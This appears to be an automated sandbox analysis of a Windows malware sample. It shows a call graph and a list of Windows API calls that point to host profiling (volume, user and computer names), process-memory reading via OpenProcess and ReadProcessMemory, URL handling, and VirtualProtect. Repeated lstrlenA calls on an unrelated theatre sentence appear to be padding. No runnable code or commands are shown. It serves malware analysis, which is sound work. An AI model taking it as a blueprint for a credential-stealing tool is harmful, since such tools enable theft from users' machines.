calls 13655->13656 13657 4045e0 13656->13657 13658 404610 34 API calls 13657->13658 13659 4045f9 13658->13659 13660 4195e0 13659->13660 13661 419a06 LoadLibraryA LoadLibraryA 13660->13661 13664 4195f0 13660->13664 13662 419a36 LoadLibraryA 13661->13662 13663 419a59 LoadLibraryA LoadLibraryA 13662->13663 13666 419a9c 13663->13666 13664->13661 13666->12943 13669 415001 13667->13669 13668 414cd0 9 API calls 13668->13669 13669->13668 13670 414da0 10 API calls 13669->13670 13671 4152bc 13669->13671 13670->13669 13671->12945 13673 416fe8 GetVolumeInformationA 13672->13673 13675 417031 13673->13675 13675->12947 13677 4048e9 13676->13677 13889 404800 13677->13889 13679 404f0e codecvt 13679->12949 13680 404ef9 InternetCloseHandle 13680->13679 13681 4048f5 13681->13679 13681->13680 13683 4112d4 13682->13683 13684 4112e7 13683->13684 13685 4112df ExitProcess 13683->13685 13686 4112f7 strtok_s 13684->13686 13689 411304 13686->13689 13687 4114d2 13687->12951 13688 4114ae strtok_s 13688->13689 13689->13687 13689->13688 13691 4059c9 13690->13691 13692 404800 4 API calls 13691->13692 13694 4059d5 13692->13694 13693 405f6a codecvt 13693->12953 13694->13693 13695 405f0e memcpy 13694->13695 13696 405f27 13695->13696 13697 405f47 memcpy 13696->13697 13697->13693 13897 41a4a0 13698->13897 13700 410b87 strtok_s 13702 410b94 13700->13702 13701 410c61 13701->12955 13702->13701 13703 410c3d strtok_s 13702->13703 13703->13702 13898 41a4a0 13704->13898 13706 4108c7 strtok_s 13709 4108d4 13706->13709 13707 410a27 13707->12959 13708 410a03 strtok_s 13708->13709 13709->13707 13709->13708 13899 41a4a0 13710->13899 13712 410a77 strtok_s 13713 410a84 13712->13713 13714 410b54 13713->13714 13715 410b30 strtok_s 13713->13715 13714->12963 13715->13713 13717 411536 13716->13717 13718 416fa0 GetVolumeInformationA 13717->13718 13719 4116a6 13718->13719 13720 4172f0 GetUserNameA 13719->13720 13721 411824 13720->13721 13722 417380 GetComputerNameA 13721->13722 13723 41189e 13722->13723 13900 414c70 13723->13900 13725 4121a9 13725->12965 13728 405020 13726->13728 13727 4050c0 memcpy 13727->13728 13728->13727 13729 4050f0 13728->13729 13729->12967 13914 409920 13730->13914 13732 410599 13733 410878 13732->13733 13734 4105bd 13732->13734 13941 410090 13733->13941 13741 410683 13734->13741 13917 40f940 13734->13917 13736 41088e 13736->12969 13738 41086d 13738->12969 13739 4107ab 13739->13738 13933 40fe70 13739->13933 13741->13739 13925 40fba0 13741->13925 14099 41a4a0 13743->14099 13745 410ca7 strtok_s 13748 410cb4 13745->13748 13746 410dc0 13746->12973 13747 410d9c strtok_s 13747->13748 13748->13746 13748->13747 13753 401ecf 13749->13753 13750 401f77 14104 401310 memset 13750->14104 13752 401f8d 13752->12975 13753->13750 14100 401710 13753->14100 14110 41a4a0 13755->14110 13757 410e16 strtok_s 13760 410e4b codecvt 13757->13760 13758 411283 13758->12984 13759 411250 strtok_s 13759->13760 13760->13758 13760->13759 13764 4138df 13761->13764 13762 413928 13762->12985 13764->13762 14111 4137a0 13764->14111 14124 41a4a0 13765->14124 13767 413097 strtok_s 13771 4130b1 13767->13771 13768 4131d7 strtok_s 13768->13771 13769 4131fb 13769->12985 13771->13768 13771->13769 14125 412940 13771->14125 13773 413c0a codecvt 13772->13773 14134 4139b0 13773->14134 13775 413c95 13776 4139b0 7 API calls 13775->13776 13777 413cbf 13776->13777 13778 4139b0 7 API calls 13777->13778 13779 413ce9 13778->13779 13780 4139b0 7 API calls 13779->13780 13781 413d13 13780->13781 13782 4139b0 7 API calls 13781->13782 13783 413d3d 13782->13783 13784 4139b0 7 API calls 13783->13784 13785 413d67 codecvt 13784->13785 13785->12991 13787 414bf3 13786->13787 14138 416d90 13787->14138 13789 414bf8 13790 414c70 7 API calls 13789->13790 13791 414c43 13790->13791 13791->12988 13793 41427a codecvt 13792->13793 13795 41438f codecvt 13793->13795 14301 414050 13793->14301 13795->12990 13797 4146aa codecvt 13796->13797 14313 4143f0 13797->14313 13799 41471d 13800 4143f0 7 API calls 13799->13800 13801 414752 13800->13801 13802 4143f0 7 API calls 13801->13802 13803 414788 13802->13803 13804 4143f0 7 API calls 13803->13804 13805 4147bd 13804->13805 13806 4143f0 7 API calls 13805->13806 13807 4147f3 13806->13807 13808 4143f0 7 API calls 13807->13808 13809 414828 codecvt 13808->13809 13809->12993 13811 41487e 13810->13811 13812 4143f0 7 API calls 13811->13812 13813 4148df memset 13812->13813 13814 41490a 13813->13814 13815 4143f0 7 API calls 13814->13815 13816 41496b memset 13815->13816 13817 414996 13816->13817 13818 4143f0 7 API calls 13817->13818 13819 4149f7 memset 13818->13819 13820 414a1c 13819->13820 13820->12994 13822 414a3a codecvt 13821->13822 13823 4143f0 7 API calls 13822->13823 13824 414ad3 13823->13824 13825 4143f0 7 API calls 13824->13825 13826 414b08 codecvt 13825->13826 13826->12998 13828 40775d codecvt 13827->13828 14318 407610 13828->14318 13831 407610 13 API calls 13832 407cdf 13831->13832 13833 407610 13 API calls 13832->13833 13834 407cee 13833->13834 13835 407610 13 API calls 13834->13835 13836 407cfd 13835->13836 13837 407610 13 API calls 13836->13837 13838 407d0c 13837->13838 13839 407610 13 API calls 13838->13839 13840 407d1b 13839->13840 13841 407610 13 API calls 13840->13841 13842 407d2a 13841->13842 13843 407610 13 API calls 13842->13843 13844 407d39 13843->13844 13845 407610 13 API calls 13844->13845 13846 407d48 13845->13846 13847 407610 13 API calls 13846->13847 13848 407d57 13847->13848 13849 407610 13 API calls 13848->13849 13850 407d66 13849->13850 13851 407610 13 API calls 13850->13851 13852 407d75 13851->13852 13853 407610 13 API calls 13852->13853 13854 407d84 13853->13854 13855 407610 13 API calls 13854->13855 13856 407d93 13855->13856 13857 407610 13 API calls 13856->13857 13858 407da2 13857->13858 13859 407610 13 API calls 13858->13859 13860 407db1 13859->13860 13861 407610 13 API calls 13860->13861 13862 407dc0 13861->13862 13863 407610 13 API calls 13862->13863 13864 407dcf 13863->13864 13865 407610 13 API calls 13864->13865 13866 407dde 13865->13866 13867 407610 13 API calls 13866->13867 13868 407ded 13867->13868 13869 407610 13 API calls 13868->13869 13870 407dfc 13869->13870 13871 407610 13 API calls 13870->13871 13872 407e0b 13871->13872 13873 407610 13 API calls 13872->13873 13874 407e1a 13873->13874 13875 407610 13 API calls 13874->13875 13876 407e29 codecvt 13875->13876 13877 414c70 7 API calls 13876->13877 13878 407eb7 codecvt 13876->13878 13877->13878 13878->13001 13880 414b4a codecvt 13879->13880 13881 4143f0 7 API calls 13880->13881 13882 414bbd codecvt 13881->13882 13882->13002 13884 418ac7 codecvt 13883->13884 13888 418aed 13884->13888 14497 4189d0 13884->14497 13886 418be0 13887 414c70 7 API calls 13886->13887 13886->13888 13887->13888 13888->12996 13895 401030 13889->13895 13892 404888 13893 404898 InternetCrackUrlA 13892->13893 13894 4048b7 13893->13894 13894->13681 13896 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 13895->13896 13896->13892 13897->13700 13898->13706 13899->13712 13901 414c95 13900->13901 13904 405150 13901->13904 13903 414caf 13903->13725 13905 405169 13904->13905 13906 404800 4 API calls 13905->13906 13907 405175 13906->13907 13908 4057d7 memcpy 13907->13908 13913 40585d codecvt 13907->13913 13909 4057f8 13908->13909 13910 4057ff memcpy 13909->13910 13911 405817 13910->13911 13912 405837 memcpy 13911->13912 13912->13913 13913->13903 13952 4098d0 ??2@YAPAXI 13914->13952 13916 409931 13916->13732 13918 40f956 13917->13918 13919 40fa73 13918->13919 13966 409d30 13918->13966 13972 40bcb0 13919->13972 13922 40fada 13983 40ea70 13922->13983 13924 40fb4c 13924->13741 13926 40fbb6 13925->13926 13927 40fd3a 13926->13927 13928 409d30 2 API calls 13926->13928 13929 40bcb0 11 API calls 13927->13929 13928->13927 13930 40fda1 13929->13930 13931 40ea70 7 API calls 13930->13931 13932 40fe13 13931->13932 13932->13739 13934 40fe86 13933->13934 13940 41005e 13934->13940 14026 4121d0 13934->14026 13936 40ff78 13936->13940 14040 40d8c0 13936->14040 13938 40ffdf 14048 40f4f0 13938->14048 13940->13738 13942 4100a6 13941->13942 13943 41052e 13942->13943 13944 41014f strtok_s 13942->13944 13943->13736 13951 410174 13944->13951 13945 4104ca 13946 414c70 7 API calls 13945->13946 13947 410504 13946->13947 13948 410515 memset 13947->13948 13948->13943 13949 418380 malloc strncpy 13949->13951 13950 4104af strtok_s 13950->13951 13951->13945 13951->13949 13951->13950 13955 407000 13952->13955 13954 4098fd codecvt 13954->13916 13958 406d90 13955->13958 13957 407028 13957->13954 13959 406db3 13958->13959 13961 406da9 13958->13961 13959->13961 13962 406a00 13959->13962 13961->13957 13963 406a19 13962->13963 13964 406a25 13962->13964 13963->13964 13965 406afd memcpy 13963->13965 13964->13961 13965->13964 13968 409d53 13966->13968 13967 409e0a 13967->13919 13968->13967 13969 409dd7 memcmp 13968->13969 13969->13967 13970 409def 13969->13970 13987 409bb0 13970->13987 13974 40bcc6 13972->13974 13973 40bd44 13973->13922 13974->13973 13976 40bcb0 11 API calls 13974->13976 13977 40a6c0 11 API calls 13974->13977 13979 414c70 7 API calls 13974->13979 13991 40a1b0 13974->13991 13997 40ad70 13974->13997 14001 40b370 13974->14001 14007 40b8e0 13974->14007 14013 40b0b0 13974->14013 13976->13974 13977->13974 13979->13974 13986 40ea7f 13983->13986 13984 40eb39 13984->13924 13986->13984 14022 40e270 13986->14022 13988 409bda 13987->13988 13989 409c1f 13988->13989 13990 409c06 memcpy 13988->13990 13989->13967 13990->13989 13996 40a1c6 13991->13996 13992 40a5e1 13994 414c70 7 API calls 13992->13994 13993 40a625 13993->13974 13994->13993 13996->13992 13996->13993 14017 409e60 13996->14017 14000 40ad86 13997->14000 13998 414c70 7 API calls 13999 40b039 13998->13999 13999->13974 14000->13998 14000->13999 14006 40b386 14001->14006 14002 40b817 14003 414c70 7 API calls 14002->14003 14004 40b86f 14002->14004 14003->14004 14004->13974 14005 409e60 2 API calls 14005->14006 14006->14002 14006->14004 14006->14005 14012 40b8f6 14007->14012 14008 409e60 2 API calls 14008->14012 14009 40bbda 14010 414c70 7 API calls 14009->14010 14011 40bc32 14009->14011 14010->14011 14011->13974 14012->14008 14012->14009 14012->14011 14014 40b0c6 14013->14014 14015 414c70 7 API calls 14014->14015 14016 40b2fd 14014->14016 14015->14016 14016->13974 14018 409e70 memcmp 14017->14018 14021 409f04 14017->14021 14019 409e8c 14018->14019 14018->14021 14020 409ea6 memset 14019->14020 14019->14021 14020->14021 14021->13996 14024 40e28d 14022->14024 14023 40e2f1 14023->13986 14024->14023 14025 40dc50 7 API calls 14024->14025 14025->14024 14027 41272b 14026->14027 14028 4121e6 14026->14028 14027->13936 14054 4060f0 14028->14054 14030 412671 14031 4060f0 4 API calls 14030->14031 14032 412698 14031->14032 14033 4060f0 4 API calls 14032->14033 14034 4126bc 14033->14034 14035 4060f0 4 API calls 14034->14035 14036 4126e3 14035->14036 14037 4060f0 4 API calls 14036->14037 14038 412707 14037->14038 14039 4060f0 4 API calls 14038->14039 14039->14027 14044 40d8d6 14040->14044 14041 40d93a 14041->13938 14044->14041 14047 40d8c0 11 API calls 14044->14047 14058 40cd30 14044->14058 14064 40d240 14044->14064 14068 40c7d0 14044->14068 14076 40d5c0 14044->14076 14047->14044 14052 40f506 14048->14052 14049 40f56d 14049->13940 14050 40f4f0 8 API calls 14050->14052 14052->14049 14052->14050 14080 418f70 14052->14080 14084 40f2e0 14052->14084 14055 406109 14054->14055 14056 404800 4 API calls 14055->14056 14057 406115 codecvt 14056->14057 14057->14030 14060 40cd46 14058->14060 14059 40d1c0 memset 14061 40d1d1 14059->14061 14060->14059 14060->14061 14062 414c70 7 API calls 14060->14062 14061->14044 14063 40d1af 14062->14063 14063->14059 14067 40d256 14064->14067 14065 40d527 14065->14044 14066 414c70 7 API calls 14066->14065 14067->14065 14067->14066 14070 40c7e4 14068->14070 14069 40ccbf 14069->14044 14070->14069 14071 40c8ee ??2@YAPAXI 14070->14071 14074 40c91f 14071->14074 14072 40cc7b 14073 414c70 7 API calls 14072->14073 14073->14069 14074->14072 14075 40c660 memset memcpy 14074->14075 14075->14074 14077 40d5d6 14076->14077 14078 40d82e 14077->14078 14079 414c70 7 API calls 14077->14079 14078->14044 14079->14078 14088 41d220 14080->14088 14083 418fa3 14083->14052 14086 40f2ff 14084->14086 14085 40f493 14085->14052 14086->14085 14090 40f140 14086->14090 14089 418f7d memset 14088->14089 14089->14083 14091 40f153 14090->14091 14093 40f27c 14091->14093 14094 40eb60 14091->14094 14093->14085 14096 40eb71 14094->14096 14095 40ebaa 14095->14093 14096->14095 14097 414c70 7 API calls 14096->14097 14098 40eb60 7 API calls 14096->14098 14097->14096 14098->14096 14099->13745 14101 401726 codecvt 14100->14101 14102 401972 14101->14102 14103 414c70 7 API calls 14101->14103 14102->13753 14103->14101 14105 401344 14104->14105 14106 414c70 7 API calls 14105->14106 14107 4014d2 14105->14107 14109 40152a 14105->14109 14106->14107 14108 40150b memset 14107->14108 14108->14109 14109->13752 14110->13757 14118 41a4a0 14111->14118 14113 4137ba strtok_s 14115 4137ce 14113->14115 14114 413842 codecvt 14114->13764 14115->14114 14117 413857 strtok_s 14115->14117 14119 4133c0 14115->14119 14117->14115 14118->14113 14121 4133e2 codecvt __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14119->14121 14120 413419 14120->14115 14121->14120 14122 4133c0 7 API calls 14121->14122 14123 414c70 7 API calls 14121->14123 14122->14121 14123->14121 14124->13767 14128 412956 14125->14128 14126 412cf5 14132 4060f0 4 API calls 14126->14132 14127 412b57 14133 4060f0 4 API calls 14127->14133 14128->14126 14128->14127 14129 412ea8 14128->14129 14130 412c6a 14128->14130 14131 4060f0 4 API calls 14129->14131 14130->13771 14131->14130 14132->14130 14133->14130 14136 4139d9 codecvt 14134->14136 14135 4139ff codecvt 14135->13775 14136->14135 14137 414c70 7 API calls 14136->14137 14137->14136 14139 416d9e 14138->14139 14142 416b70 ??_U@YAPAXI 14139->14142 14141 416dad 14141->13789 14157 41a110 14142->14157 14144 416bb1 OpenProcess 14150 416be8 construct 14144->14150 14156 416bcb 14144->14156 14145 416bf5 memset 14159 4169a0 strlen ??_U@YAPAXI 14145->14159 14146 416d4e ??_V@YAXPAX 14146->14156 14148 416c65 14148->14146 14149 416c79 ReadProcessMemory 14149->14150 14150->14145 14150->14146 14150->14148 14150->14149 14153 4080a0 memcpy codecvt 14150->14153 14154 416d15 14150->14154 14166 416dc0 14150->14166 14172 416600 14150->14172 14153->14150 14186 4080a0 14154->14186 14156->14141 14158 41a120 14157->14158 14158->14144 14189 416670 strlen 14159->14189 14161 416a0c 14162 416a24 VirtualQueryEx 14161->14162 14164 416880 ReadProcessMemory 14161->14164 14165 416aa8 14161->14165 14162->14161 14163 416b49 ??_V@YAXPAX 14162->14163 14163->14165 14164->14161 14165->14150 14167 416dd1 construct 14166->14167 14193 4082d0 14167->14193 14169 416de5 14197 4082a0 14169->14197 14173 416dc0 9 API calls 14172->14173 14174 416613 14173->14174 14276 416e40 14174->14276 14177 41662f 14280 416e70 14177->14280 14178 41664e 14284 4095a0 14178->14284 14183 4080a0 codecvt memcpy 14185 416649 14183->14185 14184 4080a0 codecvt memcpy 14184->14185 14185->14150 14187 4082d0 codecvt memcpy 14186->14187 14188 4080b3 task 14187->14188 14188->14156 14190 4166a1 strlen 14189->14190 14191 416800 14190->14191 14192 4166b7 14190->14192 14191->14161 14192->14190 14194 4082e3 14193->14194 14195 4082e1 codecvt task 14193->14195 14194->14195 14202 407230 memcpy 14194->14202 14195->14169 14203 407210 strlen 14197->14203 14199 4082b0 14204 408660 14199->14204 14201 4082c0 14201->14150 14202->14195 14203->14199 14205 408673 14204->14205 14206 40869a 14205->14206 14207 40867a construct 14205->14207 14226 408d10 14206->14226 14213 408c50 14207->14213 14209 4086a8 construct 14212 408698 codecvt 14209->14212 14235 407230 memcpy 14209->14235 14212->14201 14214 408c61 construct 14213->14214 14216 408c6e construct 14214->14216 14236 408720 14214->14236 14217 408c92 14216->14217 14218 408cb7 14216->14218 14239 408f80 14217->14239 14219 408d10 construct 7 API calls 14218->14219 14224 408cc5 construct 14219->14224 14221 408ca7 14222 408f80 construct 6 API calls 14221->14222 14223 408cb5 codecvt 14222->14223 14223->14212 14224->14223 14245 407230 memcpy 14224->14245 14227 408d21 construct 14226->14227 14228 408d2e 14227->14228 14254 408df0 14227->14254 14229 408d39 14228->14229 14233 408d4e 14228->14233 14257 409050 14229->14257 14232 408d4c codecvt 14232->14209 14233->14232 14234 4082d0 codecvt memcpy 14233->14234 14234->14232 14235->14212 14246 41d320 14236->14246 14240 408f94 14239->14240 14242 408f9c construct 14239->14242 14241 408720 construct 5 API calls 14240->14241 14241->14242 14244 408fe9 codecvt 14242->14244 14253 407250 memmove 14242->14253 14244->14221 14245->14223 14247 41a539 std::exception::exception strlen malloc strcpy_s 14246->14247 14248 41d33a 14247->14248 14249 41d394 __CxxThrowException@8 RaiseException 14248->14249 14250 41d34f 14249->14250 14251 41a5c7 std::exception::exception strlen malloc strcpy_s free 14250->14251 14252 408731 14251->14252 14252->14216 14253->14244 14265 41d2d3 14254->14265 14259 409086 construct 14257->14259 14272 409220 14259->14272 14260 409180 14261 4082d0 codecvt memcpy 14260->14261 14263 40918f codecvt 14261->14263 14262 4090fe construct 14262->14260 14275 407230 memcpy 14262->14275 14263->14232 14266 41a539 std::exception::exception strlen malloc strcpy_s 14265->14266 14267 41d2ed 14266->14267 14268 41d394 __CxxThrowException@8 RaiseException 14267->14268 14269 41d302 14268->14269 14270 41a5c7 std::exception::exception strlen malloc strcpy_s free 14269->14270 14271 408e01 14270->14271 14271->14228 14273 409440 allocator 5 API calls 14272->14273 14274 409232 14273->14274 14274->14262 14275->14260 14277 416e4f construct 14276->14277 14290 416f00 14277->14290 14279 416621 14279->14177 14279->14178 14281 416e85 14280->14281 14295 416eb0 14281->14295 14285 4095b8 construct 14284->14285 14286 4082d0 codecvt memcpy 14285->14286 14287 4095cc 14286->14287 14288 408c50 construct 8 API calls 14287->14288 14289 4095dc 14288->14289 14289->14184 14291 416f5e construct 14290->14291 14292 416f14 construct 14290->14292 14291->14279 14292->14291 14294 4165e0 memchr 14292->14294 14294->14292 14296 416ec5 construct 14295->14296 14297 4082d0 codecvt memcpy 14296->14297 14298 416ed9 14297->14298 14299 408c50 construct 8 API calls 14298->14299 14300 416641 14299->14300 14300->14183 14304 414066 14301->14304 14302 4140b2 codecvt 14302->13795 14303 414179 codecvt 14303->14302 14306 414c70 7 API calls 14303->14306 14304->14302 14304->14303 14307 413d90 memset memset 14304->14307 14306->14302 14308 413dea 14307->14308 14309 409d30 2 API calls 14308->14309 14312 413f7e codecvt 14308->14312 14310 413ea0 codecvt 14309->14310 14311 409e60 2 API calls 14310->14311 14310->14312 14311->14312 14312->14304 14316 414412 codecvt 14313->14316 14314 414438 14314->13799 14315 4143f0 7 API calls 14315->14316 14316->14314 14316->14315 14317 414c70 7 API calls 14316->14317 14317->14316 14323 407310 14318->14323 14321 407740 14321->13831 14322 40762b 14338 408160 14322->14338 14324 40731d 14323->14324 14325 40732e memset 14324->14325 14337 407380 14325->14337 14326 407580 14363 408120 14326->14363 14329 408160 task memcpy 14330 40759a 14329->14330 14330->14322 14335 4080c0 9 API calls 14335->14337 14336 409270 strcpy_s 14336->14337 14337->14326 14337->14335 14337->14336 14341 4075b0 14337->14341 14346 409290 vsprintf_s 14337->14346 14347 4081a0 14337->14347 14358 4075e0 14337->14358 14339 408560 task memcpy 14338->14339 14340 40816f task 14339->14340 14340->14321 14367 408070 14341->14367 14344 408070 memcpy 14345 4075cd 14344->14345 14345->14337 14346->14337 14348 4081b2 construct 14347->14348 14349 4081c5 construct 14348->14349 14350 408242 14348->14350 14353 4081f9 14349->14353 14371 4084f0 14349->14371 14351 40825a 14350->14351 14352 4084f0 9 API calls 14350->14352 14382 4092d0 14351->14382 14352->14351 14378 409310 14353->14378 14356 40822e 14356->14337 14359 4080a0 codecvt memcpy 14358->14359 14360 4075f2 14359->14360 14361 4080a0 codecvt memcpy 14360->14361 14362 4075fd 14361->14362 14362->14337 14364 408138 construct 14363->14364 14455 4083c0 14364->14455 14366 40758f 14366->14329 14368 408081 construct 14367->14368 14369 4082d0 codecvt memcpy 14368->14369 14370 4075c2 14369->14370 14370->14344 14372 408501 14371->14372 14373 408514 14372->14373 14376 40851e 14372->14376 14386 408b70 14373->14386 14375 40851c 14375->14353 14376->14375 14389 408860 14376->14389 14379 40931c construct 14378->14379 14439 4094f0 14379->14439 14383 4092dc construct 14382->14383 14448 4094d0 14383->14448 14387 41d2d3 std::_Xinvalid_argument 5 API calls 14386->14387 14388 408b81 14387->14388 14388->14375 14390 40888d 14389->14390 14391 408892 14390->14391 14393 40889f 14390->14393 14392 408b70 5 API calls 14391->14392 14398 40889a task 14392->14398 14393->14398 14400 408ea0 14393->14400 14397 4088e2 14397->14398 14406 408ae0 14397->14406 14398->14375 14409 4093e0 14400->14409 14403 409330 14423 409600 14403->14423 14431 409360 14406->14431 14410 4088bf 14409->14410 14411 4093fc 14409->14411 14410->14403 14412 409405 ??2@YAPAXI 14411->14412 14413 40941e 14411->14413 14412->14410 14412->14413 14417 407180 14413->14417 14418 41a539 std::exception::exception strlen malloc strcpy_s 14417->14418 14419 407193 14418->14419 14420 41d394 14419->14420 14421 41d3c9 RaiseException 14420->14421 14422 41d3bd 14420->14422 14421->14410 14422->14421 14424 409611 _Copy_impl 14423->14424 14427 409790 14424->14427 14430 4097bf 14427->14430 14428 40934f 14428->14397 14429 409310 construct 8 API calls 14429->14430 14430->14428 14430->14429 14432 409371 _Copy_impl 14431->14432 14435 409660 14432->14435 14438 409665 14435->14438 14436 408afb 14436->14398 14437 409850 task memcpy 14437->14438 14438->14436 14438->14437 14441 409504 construct 14439->14441 14440 40932c 14440->14356 14441->14440 14443 409540 14441->14443 14444 4095a0 construct 8 API calls 14443->14444 14445 409563 14444->14445 14446 4095a0 construct 8 API calls 14445->14446 14447 409575 14446->14447 14447->14440 14451 4096d0 14448->14451 14453 4096e7 construct 14451->14453 14452 4092ec 14452->14356 14453->14452 14454 409540 construct 8 API calls 14453->14454 14454->14452 14456 4083d6 14455->14456 14461 4083d1 std::error_category::default_error_condition 14455->14461 14457 408457 14456->14457 14458 4083ff 14456->14458 14479 408560 14457->14479 14464 408a90 14458->14464 14461->14366 14462 408407 construct 14462->14461 14468 408740 14462->14468 14465 408aa5 14464->14465 14483 408e10 14465->14483 14469 408752 construct 14468->14469 14470 4087ef 14469->14470 14471 408769 construct 14469->14471 14472 4084f0 9 API calls 14470->14472 14473 408807 construct 14470->14473 14474 4084f0 9 API calls 14471->14474 14475 40879d construct 14471->14475 14472->14473 14476 409310 construct 8 API calls 14473->14476 14474->14475 14478 409310 construct 8 API calls 14475->14478 14477 4087db 14476->14477 14477->14462 14478->14477 14480 40858c task 14479->14480 14481 40856f task 14479->14481 14480->14461 14482 408ae0 task memcpy 14481->14482 14482->14480 14485 408e29 std::error_category::default_error_condition 14483->14485 14484 408acf 14484->14462 14485->14484 14489 4093a0 14485->14489 14488 408ae0 task memcpy 14488->14484 14490 4093b1 _Copy_impl 14489->14490 14493 409690 14490->14493 14495 409695 construct 14493->14495 14494 408e60 14494->14488 14495->14494 14496 409720 _Copy_impl 8 API calls 14495->14496 14496->14495 14498 4189f9 14497->14498 14499 418a07 malloc 14498->14499 14500 4189ff 14498->14500 14499->14500 14501 418a25 14499->14501 14500->13886 14501->14500 14502 418a6d memset 14501->14502 14502->14500 15110 416593 15112 416551 15110->15112 15111 4155f0 130 API calls 15113 4165b6 15111->15113 15112->15111

            Control-flow Graph

            APIs
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
            • strlen.MSVCRT ref: 00404740
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
            Strings
